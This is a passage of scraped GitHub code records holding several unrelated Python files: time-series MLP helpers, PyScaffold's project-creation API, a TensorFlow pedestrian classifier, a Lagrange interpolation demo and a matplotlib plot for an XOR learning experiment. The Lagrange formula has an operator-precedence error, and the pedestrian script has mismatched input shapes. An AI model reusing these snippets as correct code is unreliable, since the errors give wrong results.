mean_squared_error as MSE\n\nimport scipy.stats\n\n\ndef mean_confidence_interval(data, confidence=0.95):\n a = 1.0 * np.array(data)\n n = len(a)\n m, se = np.mean(a), scipy.stats.sem(a)\n h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)\n return m, m-h, m+h\n\ndef gen_all_data(df):\n High = df[\"High\"]\n Low = df[\"Low\"]\n Open = df[\"Open\"]\n Close = df[\"Close\"]\n return High,Low,Open,Close\n\n\ndef bollinger(data,window):\n mu = data.rolling(window=window).mean()\n std = data.rolling(window=window).std()\n upper_band = mu + 2*std\n lower_band = mu -2*std\n return mu, upper_band, lower_band\n\n\ndef exp_mov_average(data,window):\n exp = data.ewm(span = window, adjust = False).mean()\n return exp\n\n\ndef get_windows(data,window_size):\n windows = []\n for i in range(len(data)-window_size+1):\n windows.append(data[i: i + window_size])\n return windows\n\n\ndef bollinger_windows(data,window):\n mu,ub,lb = bollinger(data,20)\n ubw = get_windows(ub,5)\n lbw = get_windows(lb,5)\n return ubw,lbw\n\ndef mult_mlp(x_train,x_test,y_train,y_test,iter):\n highs = []\n lows = []\n for i in range(iter):\n mlp = MLPRegressor(hidden_layer_sizes=12,\n activation='relu', solver='lbfgs',\n max_iter = 100, learning_rate= 'constant')\n\n mlp.fit(x_train,y_train)\n predict = mlp.predict(x_test)\n\n top_test = [y_test[i][0] for i in range(len(y_test))]\n bottom_test = [y_test[i][1] for i in range(len(y_test))]\n\n top_pred = [predict[i][0] for i in range(len(predict))]\n bottom_pred = [predict[i][1] for i in range(len(predict))]\n highs.append(top_pred[0])\n lows.append(bottom_pred[0])\n return highs, lows","repo_name":"ggcarvalho/timeseries_final","sub_path":"methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71829432253","text":"# -*- coding: utf-8 -*-\n\"\"\"\nExposed API for accessing PyScaffold via Python.\n\"\"\"\nfrom __future__ import absolute_import\n\nimport os\nfrom datetime import date\nfrom functools import reduce\n\nimport pyscaffold\n\nfrom .. 
import info, repo, utils\nfrom ..exceptions import (\n DirectoryAlreadyExists,\n DirectoryDoesNotExist,\n GitNotConfigured,\n GitNotInstalled,\n InvalidIdentifier\n)\nfrom ..log import logger\nfrom ..structure import (\n apply_update_rules,\n create_structure,\n define_structure\n)\nfrom . import helpers\n\n# -------- Actions --------\n\nDEFAULT_OPTIONS = {'update': False,\n 'force': False,\n 'description': 'Add a short description here!',\n 'url': 'http://...',\n 'license': 'none',\n 'version': pyscaffold.__version__,\n 'classifiers': utils.list2str(\n ['Development Status :: 4 - Beta',\n 'Programming Language :: Python'],\n indent=4, brackets=False, quotes=False, sep='')}\n\n\ndef get_default_options(struct, given_opts):\n \"\"\"Compute all the options that can be automatically derived.\n\n This function uses all the available information to generate sensible\n defaults. Several options that can be derived are computed when possible.\n\n Args:\n struct (dict): project representation as (possibly) nested\n :obj:`dict`.\n given_opts (dict): given options, see :obj:`create_project` for\n an extensive list.\n\n Returns:\n dict: options with default values set\n\n Raises:\n :class:`~.DirectoryDoesNotExist`: when PyScaffold is told to\n update an inexistent directory\n :class:`~.GitNotInstalled`: when git command is not available\n :class:`~.GitNotConfigured`: when git does not know user information\n\n Note:\n This function uses git to determine some options, such as author name\n and email.\n \"\"\"\n\n # This function uses information from git, so make sure it is available\n _verify_git()\n\n opts = DEFAULT_OPTIONS.copy()\n opts.update(given_opts)\n project_name = opts['project']\n\n opts.setdefault('package', utils.make_valid_identifier(opts['project']))\n opts.setdefault('author', info.username())\n opts.setdefault('email', info.email())\n opts.setdefault('release_date', date.today().strftime('%Y-%m-%d'))\n opts.setdefault('year', date.today().year)\n opts.setdefault('title',\n '='*len(opts['project']) + '\\n' + opts['project'] + '\\n' +\n '='*len(opts['project']))\n\n # Initialize empty list of all requirements and extensions\n # (since not using deep_copy for the DEFAULT_OPTIONS, better add compound\n # values inside this function)\n opts.setdefault('requirements', list())\n opts.setdefault('extensions', list())\n\n opts.setdefault('root_pkg', opts['package'])\n opts.setdefault('namespace_pkg', opts['package'])\n\n if opts['update']:\n if not os.path.exists(project_name):\n raise DirectoryDoesNotExist(\n \"Project {project} does not exist and thus cannot be \"\n \"updated!\".format(project=project_name))\n opts = info.project(opts)\n # Reset project name since the one from setup.cfg might be different\n opts['project'] = project_name\n\n opts.setdefault('pretend', False)\n\n return (struct, opts)\n\n\ndef verify_options_consistency(struct, opts):\n \"\"\"Perform some sanity checks about the given options.\"\"\"\n if os.path.exists(opts['project']):\n if not opts['update'] and not opts['force']:\n raise DirectoryAlreadyExists(\n \"Directory {dir} already exists! 
Use the `update` option to \"\n \"update an existing project or the `force` option to \"\n \"overwrite an existing directory.\".format(dir=opts['project']))\n if not utils.is_valid_identifier(opts['package']):\n raise InvalidIdentifier(\n \"Package name {} is not a valid \"\n \"identifier.\".format(opts['package']))\n\n return (struct, opts)\n\n\ndef init_git(struct, opts):\n \"\"\"Add revision control to the generated files.\"\"\"\n if not opts['update'] and not repo.is_git_repo(opts['project']):\n repo.init_commit_repo(opts['project'], struct,\n log=True, pretend=opts.get('pretend'))\n\n return (struct, opts)\n\n\n# -------- API --------\n\nDEFAULT_ACTIONS = [\n get_default_options,\n verify_options_consistency,\n define_structure,\n apply_update_rules,\n create_structure,\n init_git\n]\n\n\ndef discover_actions(extensions):\n \"\"\"Retrieve the action list.\n\n This is done by concatenating the default list with the one generated after\n activating the extensions.\n\n Args:\n extensions (list): list of functions responsible for activating the\n extensions.\n\n Returns:\n list: scaffold actions.\n \"\"\"\n actions = DEFAULT_ACTIONS\n\n # Activate the extensions\n return reduce(lambda acc, f: _activate(f, acc), extensions, actions)\n\n\ndef create_project(opts=None, **kwargs):\n \"\"\"Create the project's directory structure\n\n Args:\n opts (dict): options of the project\n **kwargs: extra options, passed as keyword arguments\n\n Valid options include:\n\n :Naming: - **project** (*str*)\n - **package** (*str*)\n\n :Package Information: - **author** (*str*)\n - **email** (*str*)\n - **release_date** (*str*)\n - **year** (*str*)\n - **title** (*str*)\n - **description** (*str*)\n - **url** (*str*)\n - **classifiers** (*str*)\n - **requirements** (*list*)\n\n :PyScaffold Control: - **update** (*bool*)\n - **force** (*bool*)\n - **pretend** (*bool*)\n - **extensions** (*list*)\n\n Some of these options are equivalent to the command line options, others\n are used for creating the basic python package meta information, but the\n last tree can change the way PyScaffold behaves.\n\n When the **force** flag is ``True``, existing files will be overwritten.\n When the **update** flag is ``True``, PyScaffold will consider that some\n files can be updated (usually the packaging boilerplate),\n but will keep others intact.\n When the **pretend** flag is ``True``, the project will not be\n created/updated, but the expected outcome will be logged.\n\n Finally, the **extensions** list may contain any function that follows the\n `extension API <../extensions>`_. Note that some PyScaffold features, such\n as travis, tox and pre-commit support, are implemented as built-in\n extensions. In order to use these features it is necessary to include the\n respective functions in the extension list. All built-in extensions are\n accessible via :mod:`pyscaffold.extensions` submodule, and use\n ``extend_project`` as naming convention::\n\n # Using built-in extensions\n from pyscaffold.extensions import pre_commit, travis, tox\n\n opts = { #...\n \"extensions\": [e.extend_project\n for e in pre_commit, travis, tox]}\n create_project(opts)\n\n Note that extensions may define extra options. 
For example, built-in\n cookiecutter extension define a ``cookiecutter_template`` option that\n should be the address to the git repository used as template.\n \"\"\"\n opts = opts if opts else {}\n opts.update(kwargs)\n\n actions = discover_actions(opts.get('extensions', []))\n\n # Call the actions\n return reduce(lambda acc, f: _invoke(f, *acc), actions, ({}, opts))\n\n\n# -------- Auxiliary functions --------\n\ndef _activate(extension, actions):\n \"\"\"Activate extension with proper logging.\"\"\"\n logger.report('activate', extension.__module__)\n with logger.indent():\n actions = extension(actions, helpers)\n\n return actions\n\n\ndef _invoke(action, struct, opts):\n \"\"\"Invoke action with proper logging.\"\"\"\n logger.report('invoke', helpers.get_id(action))\n with logger.indent():\n struct, opts = action(struct, opts)\n\n return (struct, opts)\n\n\ndef _verify_git():\n \"\"\"Check if git is installed and able to provide the required information.\n \"\"\"\n if not info.is_git_installed():\n raise GitNotInstalled\n if not info.is_git_configured():\n raise GitNotConfigured\n","repo_name":"hatef207/work_test01","sub_path":"lib/python2.7/site-packages/pyscaffold/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28764190877","text":"from PIL import Image\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\n# from sklearn.model_selection import train_test_split\n\n# from sklearn import svm\nfrom SVM import SVM\n\n'''\nc=Image.open(\"img_00000.pgm\")\nprint(list(c.getdata()))\n'''\n# 4800\nlength1 = 200\n# 5000\nlength2 = 200\n\nlabels = []\n# images_data =[]\n\ntest_labels = []\n# images_test_data = []\nfeatures = []\n\nfor i in range(648):\n features.append(\"feat\" + str(i))\n\ndf1 = pd.DataFrame(columns=features)\ndf2 = pd.DataFrame(columns=features)\n# load_training_dataset\nfor i in range(1, 4):\n for j in range(length1): # 4800\n file_dir = '/ped_examples/'\n strr = (str(i) + file_dir)\n\n img = np.array(Image.open(strr + \"img_\" + \"{0:05}\".format(j) + \".pgm\"))\n img = img.flatten()\n df1.loc[j + ((i - 1) * length1)] = img\n # images_data=np.append(images_data, img)\n labels.append(1) # pedestrian\n\nfor i in range(1, 4):\n for j in range(length2): # 5000\n file_dir = '/non-ped_examples/'\n strr = (str(i) + file_dir)\n\n img = np.array(Image.open(strr + \"img_\" + \"{0:05}\".format(j) + \".pgm\"))\n img = img.flatten()\n df1.loc[j + ((i - 1) * length2 + (3 * length1))] = img\n # images_data=np.append(images_data, img)\n labels.append(0) # non-pedestrian\n\n# load_testing_dataset\nfor i in range(1, 3):\n for j in range(length1): # 4800\n file_dir = \"/ped_examples/\"\n strr = ('T' + str(i) + file_dir)\n\n img = np.array(Image.open(strr + \"img_\" + \"{0:05}\".format(j) + \".pgm\"))\n img = img.flatten()\n df2.loc[j + ((i - 1) * length1)] = img\n # images_test_data=np.append(images_test_data, img)\n test_labels.append(1) # pedestrian\n\n for j in range(length2): # 5000\n file_dir = \"/non-ped_examples/\"\n strr = ('T' + str(i) + file_dir)\n\n img = np.array(Image.open(strr + \"img_\" + \"{0:05}\".format(j) + \".pgm\"))\n img = img.flatten()\n df2.loc[j + ((i - 1) * length2 + (2 * length1))] = img\n # images_test_data=np.append(images_test_data, img)\n test_labels.append(0) # non-pedestrian\n\nprint(df1)\nmodel = tf.keras.models.Sequential([\n tf.keras.layers.Flatten(input_shape=(36, 18)),\n tf.keras.layers.Dense(512, 
activation=tf.nn.relu),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Dense(10, activation=tf.nn.softmax)\n])\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\ntrain = pd.read_csv('pedestrian.csv')\nX1 = train.drop('ped',axis=1).values\ny1 = train['ped'].values\n\ntest=pd.read_csv('test_pedestrian.csv')\nX2 = test.drop('ped',axis=1).values\ny2 = test['ped'].values\nmodel.fit(X1, y1, epochs=5)\nmodel.evaluate(X2, y2)\n\ndef cnn_model_fn(features, labels, mode):\n # Input Layer\n input_layer = tf.reshape(features[\"x\"], [-1, 28, 28, 1])\n\n # Convolutional Layer #1\n conv1 = tf.layers.conv2d(\n inputs=input_layer,\n filters=32,\n kernel_size=[5, 5],\n padding=\"same\",\n activation=tf.nn.relu)\n\n # Pooling Layer #1\n pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2)\n\n # Convolutional Layer #2 and Pooling Layer #2\n conv2 = tf.layers.conv2d(\n inputs=pool1,\n filters=64,\n kernel_size=[5, 5],\n padding=\"same\",\n activation=tf.nn.relu)\n pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)\n\n # Dense Layer\n pool2_flat = tf.reshape(pool2, [-1, 7 * 7 * 64])\n dense = tf.layers.dense(inputs=pool2_flat, units=1024, activation=tf.nn.relu)\n dropout = tf.layers.dropout(\n inputs=dense, rate=0.4, training=mode == tf.estimator.ModeKeys.TRAIN)\n\n # Logits Layer\n logits = tf.layers.dense(inputs=dropout, units=10)\n\n predictions = {\n # Generate predictions (for PREDICT and EVAL mode)\n \"classes\": tf.argmax(input=logits, axis=1),\n # Add `softmax_tensor` to the graph. It is used for PREDICT and by the\n # `logging_hook`.\n \"probabilities\": tf.nn.softmax(logits, name=\"softmax_tensor\")\n }\n\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n # Calculate Loss (for both TRAIN and EVAL modes)\n loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)\n\n # Configure the Training Op (for TRAIN mode)\n if mode == tf.estimator.ModeKeys.TRAIN:\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)\n train_op = optimizer.minimize(\n loss=loss,\n global_step=tf.train.get_global_step())\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n\n # Add evaluation metrics (for EVAL mode)\n eval_metric_ops = {\n \"accuracy\": tf.metrics.accuracy(\n labels=labels, predictions=predictions[\"classes\"])\n }\n return tf.estimator.EstimatorSpec(\n mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\ncnn_model_fn(X1,y1,tf.estimator.ModeKeys.TRAIN)\ncnn_model_fn(X1,y1,tf.estimator.ModeKeys.PREDICT)\n\n","repo_name":"Abudo-S/pedestrian","sub_path":"predestrain3.py","file_name":"predestrain3.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29413094130","text":"import matplotlib.pyplot as plt\nimport math\n\n# 给出一组数据进行lagrange插值,同时将结果用plot展现出来\ndef lagrange(x_,y,a):\n \"\"\"\n 获取拉格朗日插值\n :param x_: x的列表值\n :param y: y的列表值\n :param a: 需要插值的数\n :return: 返回插值结果\n \"\"\"\n ans = 0.0\n for i in range(len(y)):\n t_ = y[i]\n for j in range(len(y)):\n if i != j:\n t_ *= (a - x_[j] / (x_[i] - x_[j]))\n ans += t_\n return ans\n\ndef draw_picture(x_list,y_list,node):\n plt.title(\"lagrange\")\n plt.xlabel(\"x\")\n plt.ylabel(\"y\")\n for i in range(len(x_list)):\n plt.scatter(x_list[i],y_list[i],color=\"purple\",linewidths=2)\n plt.scatter(node[0],node[1],color=\"blue\",linewidths=2)\n 
plt.show()\n\nif __name__ == '__main__':\n x = 0.54\n x_1 = [0.4, 0.5, 0.6, 0.7, 0.8]\n y_1 = [-0.9163, -0.6931, -0.5108, -0.3567, -0.2231]\n lagrange = lagrange(x_1,y_1,x)\n print(\"拉格朗日插值:{}\".format(lagrange))\n # 画图\n draw_picture(x_1, y_1, (x, lagrange))","repo_name":"IronmanJay/Python_Project","sub_path":"NumericalAnalysis/lagrange.py","file_name":"lagrange.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"78"} +{"seq_id":"37228205938","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.gridspec as gridspec\nimport sys\nsys.path.append('../')\nplt.style.use('../thesis_mplrc.dms')\nfrom utils_plotting import remove_xticklabel\nfrom utils_plotting import custom_colors\nfrom utils_plotting import set_axis_color\nimport raster_analysis as ra\n#from raster_analysis import add_step\nimport seaborn as sns\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-durex\", type=float, help=\"duration of example\")\nparser.add_argument(\"-alpha\", type=float, help=\"moving average time scale\")\nparser.add_argument(\"-numex\", type=int, help=\"number of training examples\")\nparser.add_argument(\"-numberofrealiz\", type=int, help=\"number of realization of the noise\", default=1)\n\nargs = parser.parse_args()\nnumber_of_realizations = args.numberofrealiz\n\n\n# import data\ndata_file_prefix = '../../data/xor-test/sym-ff/multiple-reals/xor-test.0.brate_'\ndatadir = '../../data/xor-test/sym-ff/multiple-reals/'\nfilenames_output = []\nfor i in range(1, number_of_realizations+1):\n filenames_output.append(data_file_prefix + 'output_seed'+str(i))\noutput_rates = np.loadtxt(data_file_prefix + 'output_seed1')\nhidden1_rates = np.loadtxt(data_file_prefix + 'hidden1_seed1')\nhidden2_rates = np.loadtxt(data_file_prefix + 'hidden2_seed1')\ninput1_rates = np.loadtxt(data_file_prefix + 'input1_seed1')\ninput2_rates = np.loadtxt(data_file_prefix + 'input2_seed1')\n#cost_epoch = np.loadtxt(datadir + 'cost_epoch.dat')\n\n\n# compute output rate\nbinSize = hidden1_rates[1,0] - hidden1_rates[0,0]\ntime_output, mean_output, std_output = ra.std_BRER_over_realizations(filenames_output, binsize=binSize)\n\n\n# define selected pre, during and post learning intervals\nafter_learning = [hidden1_rates.shape[0]-int(4*args.durex/binSize), hidden1_rates.shape[0]+1]\nbefore_learning = [int(3*args.alpha/binSize)+1, int(3*args.alpha/binSize)+int(4*args.durex/binSize)+1]\nduring_learning_interval = [3*args.alpha + args.numex//5*args.durex,\n 3*args.alpha + args.numex//5*args.durex + 4*args.durex]\nduring_learning = [int(during_learning_interval[0]/binSize) + 1,\n int(during_learning_interval[1]/binSize) + 1]\n\ner_trace = np.loadtxt(datadir + 'xor-test0.0.trevent_seed1')\nbr_trace = np.loadtxt(datadir + 'xor-test0.0.trburst_seed1')\nfor i in range(1,50):\n er_tmp = np.loadtxt(datadir + 'xor-test'+str(i)+'.0.trevent_seed1')\n br_tmp = np.loadtxt(datadir + 'xor-test'+str(i)+'.0.trburst_seed1')\n er_trace[:,1] += er_tmp[:,1]\n br_trace[:,1] += br_tmp[:,1]\ner_trace[:,1] /= 50.\nbr_trace[:,1] /= 50.\ner_trace = er_trace\nbr_trace = br_trace\n\ne_min = 2.\ne_max = 10.\ne_th = e_min + 0.5*(e_max - e_min)\n\n\n\nfig = plt.figure(figsize=(183/25.4, 4.5/7.5*183/25.4))\n# first subplot is empty\n\n# inputs\nax1 = fig.add_subplot(337)\nax1.plot(input1_rates[before_learning[0]:before_learning[1], 0],\n input1_rates[before_learning[0]:before_learning[1], 2],\n color=custom_colors['blue'], label='input 
1')\nax1.plot(input2_rates[before_learning[0]:before_learning[1], 0],\n input2_rates[before_learning[0]:before_learning[1], 2], '-', lw=1, color=custom_colors['blue'], label='input 2')\nxtik = list(3*args.alpha + args.durex*np.arange(5))\nax1.text(xtik[0] + args.durex/2., -0.5, '(0, 0)', horizontalalignment='center', verticalalignment='top')\nax1.text(xtik[1] + args.durex/2., -0.5, '(1, 0)', horizontalalignment='center', verticalalignment='top')\nax1.text(xtik[2] + args.durex/2., -0.5, '(0, 1)', horizontalalignment='center', verticalalignment='top')\nax1.text(xtik[3] + args.durex/2., -0.5, '(1, 1)', horizontalalignment='center', verticalalignment='top')\nax1.set_ylabel('ER, input [Hz]')\nax1.set_ylim([0, 11])\n#ax1.set_title('Inputs for all examples', fontdict=None, loc='center', fontsize=9)\nax1.set_xticks(xtik)\nax1.set_yticks([0, 10])\nax1.spines['top'].set_visible(False)\nax1.spines['right'].set_visible(False)\nax1.legend(loc='best')\nremove_xticklabel(ax1)\n\n\n# output before/after\nax2 = fig.add_subplot(332)\nax2.plot(time_output[before_learning[0]:before_learning[1]],\n mean_output['ER'][before_learning[0]:before_learning[1]],\n linestyle='dashed', color=custom_colors['blue'], label='before')\nax2.fill_between(time_output[before_learning[0]:before_learning[1]],\n mean_output['ER'][before_learning[0]:before_learning[1]] - 2*std_output['ER'][before_learning[0]:before_learning[1]],\n mean_output['ER'][before_learning[0]:before_learning[1]] + 2*std_output['ER'][before_learning[0]:before_learning[1]],\n color=custom_colors['blue'], alpha=0.5, lw=0)\nax2.plot(time_output[before_learning[0]:before_learning[1]],\n mean_output['ER'][after_learning[0]:after_learning[1]],\n color=custom_colors['blue'], label='after')\nax2.fill_between(time_output[before_learning[0]:before_learning[1]],\n mean_output['ER'][after_learning[0]:after_learning[1]] - 2*std_output['ER'][after_learning[0]:after_learning[1]],\n mean_output['ER'][after_learning[0]:after_learning[1]] + 2*std_output['ER'][after_learning[0]:after_learning[1]],\n color=custom_colors['blue'], alpha=0.5, lw=0)\nax2.plot(time_output[before_learning[0]:before_learning[1]],\n e_th*np.ones(np.shape(mean_output['ER'][before_learning[0]:before_learning[1]])), 'k:', lw=0.5)\nax2.text(xtik[0] + args.durex/2., -0.5, '(0, 0)', horizontalalignment='center', verticalalignment='top')\nax2.text(xtik[1] + args.durex/2., -0.5, '(1, 0)', horizontalalignment='center', verticalalignment='top')\nax2.text(xtik[2] + args.durex/2., -0.5, '(0, 1)', horizontalalignment='center', verticalalignment='top')\nax2.text(xtik[3] + args.durex/2., -0.5, '(1, 1)', horizontalalignment='center', verticalalignment='top')\nax2.set_ylabel('ER, output [Hz]')\nax2.set_ylim([0, 11])\n#ax2.set_title('Output before/after learning', fontdict=None, loc='center', fontsize=9)\nax2.set_xticks(xtik)\nax2.set_yticks([0, 10])\nax2.spines['top'].set_visible(False)\nax2.spines['right'].set_visible(False)\nax2.legend(loc='best')\nremove_xticklabel(ax2)\n#set_axis_color(ax2, custom_colors['sky_blue'])\n\n\n# error generation at output layer\nax3 = fig.add_subplot(333)\nr_out = output_rates[during_learning[0]:during_learning[1], :]\nteacher = np.zeros(np.shape(r_out[:,2]))\ner_est = er_trace[during_learning[0]:during_learning[1], 1]/args.alpha\nxtik = list(during_learning_interval[0] + args.durex*np.arange(5))\n\nra.add_step(teacher, int(0.9*args.durex/binSize), int(0.1*args.durex/binSize)-1, -1./(e_max - er_est[int(0.9*args.durex/binSize)]))\nra.add_step(teacher, int(1.9*args.durex/binSize), 
int(0.1*args.durex/binSize)-1, 1./(er_est[int(1.9*args.durex/binSize)] - e_min))\nra.add_step(teacher, int(2.9*args.durex/binSize), int(0.1*args.durex/binSize)-1, 1./(er_est[int(2.9*args.durex/binSize)] - e_min))\nra.add_step(teacher, int(3.9*args.durex/binSize), int(0.1*args.durex/binSize)-1, -1./(e_max - er_est[int(3.9*args.durex/binSize)]))\n\nax3.plot(r_out[:, 0], 100*r_out[:, 1]/r_out[:, 2], color=custom_colors['red'])\nax3.text(xtik[0] + args.durex/2., -4.5, '(0, 0)', horizontalalignment='center', verticalalignment='top')\nax3.text(xtik[1] + args.durex/2., -4.5, '(1, 0)', horizontalalignment='center', verticalalignment='top')\nax3.text(xtik[2] + args.durex/2., -4.5, '(0, 1)', horizontalalignment='center', verticalalignment='top')\nax3.text(xtik[3] + args.durex/2., -4.5, '(1, 1)', horizontalalignment='center', verticalalignment='top')\n#ax3.set_title('Error generation at output layer', fontdict=None, loc='center', fontsize=9)\nremove_xticklabel(ax3)\n#set_axis_color(ax3, custom_colors['sky_blue'])\nax3.set_yticks([0, 45, 90])\nax3.set_ylabel('BP, output [%]', color=custom_colors['red'])\nax3.spines['top'].set_visible(False)\n\nax3_tw = ax3.twinx()\nax3_tw.plot(r_out[:, 0], teacher, '--', lw=1, color=custom_colors['pink'])\nax3_tw.set_xticks(xtik)\n#set_axis_color(ax3_tw, custom_colors['sky_blue'])\n#ax3_tw.set_ylim(ax3_tw.get_yticks()[0], ax3_tw.get_yticks()[-1])\nax3_tw.set_yticks([-0.4, 0, 0.4])\nax3_tw.set_ylabel('Teaching current [nA]', color=custom_colors['pink'])\nax3_tw.spines['top'].set_visible(False)\n\n\n# error propagation in hidden layers\nax4 = fig.add_subplot(335)\nr_hid1 = hidden1_rates[during_learning[0]:during_learning[1], :]\nr_out = output_rates[during_learning[0]:during_learning[1], :]\nBP = 100*r_hid1[:, 1]/r_hid1[:, 2]\nmin_BP = np.min(BP)\nmax_BP = np.max(BP)\nmin_current_dend = np.min(r_out[:,1])\nmax_current_dend = np.max(r_out[:,1])\nrescaled_BR = min_BP + (r_out[:,1] - min_current_dend)*(max_BP-min_BP)/(max_current_dend-min_current_dend)\nax4.plot(r_hid1[:, 0], BP, color=custom_colors['red'])\nax4.plot(r_out[:, 0], rescaled_BR, ':', color=custom_colors['orange'], label='output BR (rescaled)')\nax4.set_xticks(xtik)\nax4.set_yticks([0, 50])\nax4.set_ylim([0, 60])\nax4.set_ylabel('BP, hidden 1 [%]')\nax4.text(xtik[0] + args.durex/2., -2.5, '(0, 0)', horizontalalignment='center', verticalalignment='top')\nax4.text(xtik[1] + args.durex/2., -2.5, '(1, 0)', horizontalalignment='center', verticalalignment='top')\nax4.text(xtik[2] + args.durex/2., -2.5, '(0, 1)', horizontalalignment='center', verticalalignment='top')\nax4.text(xtik[3] + args.durex/2., -2.5, '(1, 1)', horizontalalignment='center', verticalalignment='top')\n#ax4.set_title('Error propagation to hidden 1', fontdict=None, loc='center', fontsize=9)\nax4.spines['top'].set_visible(False)\nax4.spines['right'].set_visible(False)\nax4.legend(loc='best')\nremove_xticklabel(ax4)\n#set_axis_color(ax4, custom_colors['bluish_green'])\n\n\nax5 = fig.add_subplot(336)\nr_hid2 = hidden2_rates[during_learning[0]:during_learning[1], :]\nBP = 100*r_hid2[:, 1]/r_hid2[:, 2]\nmin_BP = np.min(BP)\nmax_BP = np.max(BP)\nBR_out = -output_rates[during_learning[0]:during_learning[1], 1]\nmin_current_dend = np.min(BR_out)\nmax_current_dend = np.max(BR_out)\nrescaled_BR = min_BP + (BR_out - min_current_dend)*(max_BP-min_BP)/(max_current_dend-min_current_dend)\nax5.plot(r_hid2[:, 0], BP, color=custom_colors['red'])\nax5.plot(r_out[:, 0], rescaled_BR, ':', color=custom_colors['orange'], label='output BR (inverted & 
rescaled)')\n\nax5.set_xticks(list(during_learning[0]*binSize + args.durex*np.arange(5)-1))\nax5.set_yticks([0, 50])\nax5.set_ylim([0, 60])\nax5.set_ylabel('BP, hidden 2 [%]')\nax5.text(xtik[0] + args.durex/2., -2.5, '(0, 0)', horizontalalignment='center', verticalalignment='top')\nax5.text(xtik[1] + args.durex/2., -2.5, '(1, 0)', horizontalalignment='center', verticalalignment='top')\nax5.text(xtik[2] + args.durex/2., -2.5, '(0, 1)', horizontalalignment='center', verticalalignment='top')\nax5.text(xtik[3] + args.durex/2., -2.5, '(1, 1)', horizontalalignment='center', verticalalignment='top')\n#ax5.set_title('Error propagation to hidden 2', fontdict=None, loc='center', fontsize=9)\nax5.spines['top'].set_visible(False)\nax5.spines['right'].set_visible(False)\nax5.legend(loc='lower left')\nremove_xticklabel(ax5)\n#set_axis_color(ax5, custom_colors['bluish_green'])\n\n# hidden 1 before/after\nax6 = fig.add_subplot(338)\nax6.plot(hidden1_rates[before_learning[0]:before_learning[1], 0], hidden1_rates[before_learning[0]:before_learning[1], 2],\n linestyle='dashed', color=custom_colors['blue'], label='before')\nax6.plot(hidden1_rates[before_learning[0]+1:before_learning[1], 0], hidden1_rates[after_learning[0]+1:after_learning[1], 2],\n color=custom_colors['blue'], label='after')\nxtik = list(3*args.alpha + args.durex*np.arange(5))\nax6.text(xtik[0] + args.durex/2., -0.5, '(0, 0)', horizontalalignment='center', verticalalignment='top')\nax6.text(xtik[1] + args.durex/2., -0.5, '(1, 0)', horizontalalignment='center', verticalalignment='top')\nax6.text(xtik[2] + args.durex/2., -0.5, '(0, 1)', horizontalalignment='center', verticalalignment='top')\nax6.text(xtik[3] + args.durex/2., -0.5, '(1, 1)', horizontalalignment='center', verticalalignment='top')\nax6.set_ylabel('ER, hidden 1 [Hz]')\nax6.set_ylim([0, 11])\n#ax6.set_title('Hidden 1 before/after learning', fontdict=None, loc='center', fontsize=9)\nax6.set_xticks(xtik)\nax6.set_yticks([0, 10])\nax6.spines['top'].set_visible(False)\nax6.spines['right'].set_visible(False)\nax6.legend(loc='best')\nremove_xticklabel(ax6)\n#set_axis_color(ax6, custom_colors['bluish_green'])\n\n\n# hidden 2 before/after\nax7 = fig.add_subplot(339)\nax7.plot(hidden2_rates[before_learning[0]:before_learning[1], 0], hidden2_rates[before_learning[0]:before_learning[1], 2],\n linestyle='dashed', color=custom_colors['blue'], label='before')\nax7.plot(hidden2_rates[before_learning[0]+1:before_learning[1], 0], hidden2_rates[after_learning[0]+1:after_learning[1], 2],\n color=custom_colors['blue'], label='after')\nax7.text(xtik[0] + args.durex/2., -0.5, '(0, 0)', horizontalalignment='center', verticalalignment='top')\nax7.text(xtik[1] + args.durex/2., -0.5, '(1, 0)', horizontalalignment='center', verticalalignment='top')\nax7.text(xtik[2] + args.durex/2., -0.5, '(0, 1)', horizontalalignment='center', verticalalignment='top')\nax7.text(xtik[3] + args.durex/2., -0.5, '(1, 1)', horizontalalignment='center', verticalalignment='top')\nax7.set_ylabel('ER, hidden 2 [Hz]')\nax7.set_ylim([0, 11])\n#ax7.set_title('Hidden 2 before/after learning', fontdict=None, loc='center', fontsize=9)\nax7.set_xticks(xtik)\nax7.set_yticks([0, 10])\nax7.spines['top'].set_visible(False)\nax7.spines['right'].set_visible(False)\nax7.legend(loc='best')\nremove_xticklabel(ax7)\n#set_axis_color(ax7, 
